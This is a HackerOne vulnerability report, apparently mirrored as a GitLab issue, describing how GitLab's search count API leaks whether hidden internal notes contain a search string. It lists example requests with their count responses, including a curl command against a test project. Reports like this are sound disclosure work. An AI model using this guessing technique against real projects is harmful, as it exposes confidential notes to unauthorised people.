Gitlab search allows leaking internal notes
HackerOne report #1829768 by shells3c
on 2023-01-10, assigned to @ameyadarshan:
Report
Summary
Gitlab search count API returns the count of results gotten from internal notes despite users having no permission to view those notes. This results in guessing/brute-forcing the internal notes
Steps to reproduce
- Create a public project, then a public issue and make an internal note with the message: Internal comment
- Logout and do the following tests:
https://gitlab.com/search/count?project_id=<ID>&scope=notes&search="Internal c"
{"count":"1"}
https://gitlab.com/search/count?project_id=<ID>&scope=notes&search="Internal cc"
{"count":"0"}
https://gitlab.com/search/count?project_id=<ID>&scope=notes&search="Internal co"
{"count":"1"}
https://gitlab.com/search/count?project_id=<ID>&scope=notes&search="Internal comment"
{"count":"1"}
Examples
I have created an example project for testing:
curl 'https://gitlab.com/search/count?project_id=25681831&scope=notes&search=%22CVE-2021-1234%22'
{"count":"1"}
You can confirm that the note CVE-2021-1234
exists, even though you can't see it in the Gitlab search results: https://gitlab.com/search?project_id=25681831&scope=notes&search=%22CVE-2021-1234%22
Impact
Leaking internal notes of public issues
How To Reproduce
Please add reproducibility information to this section: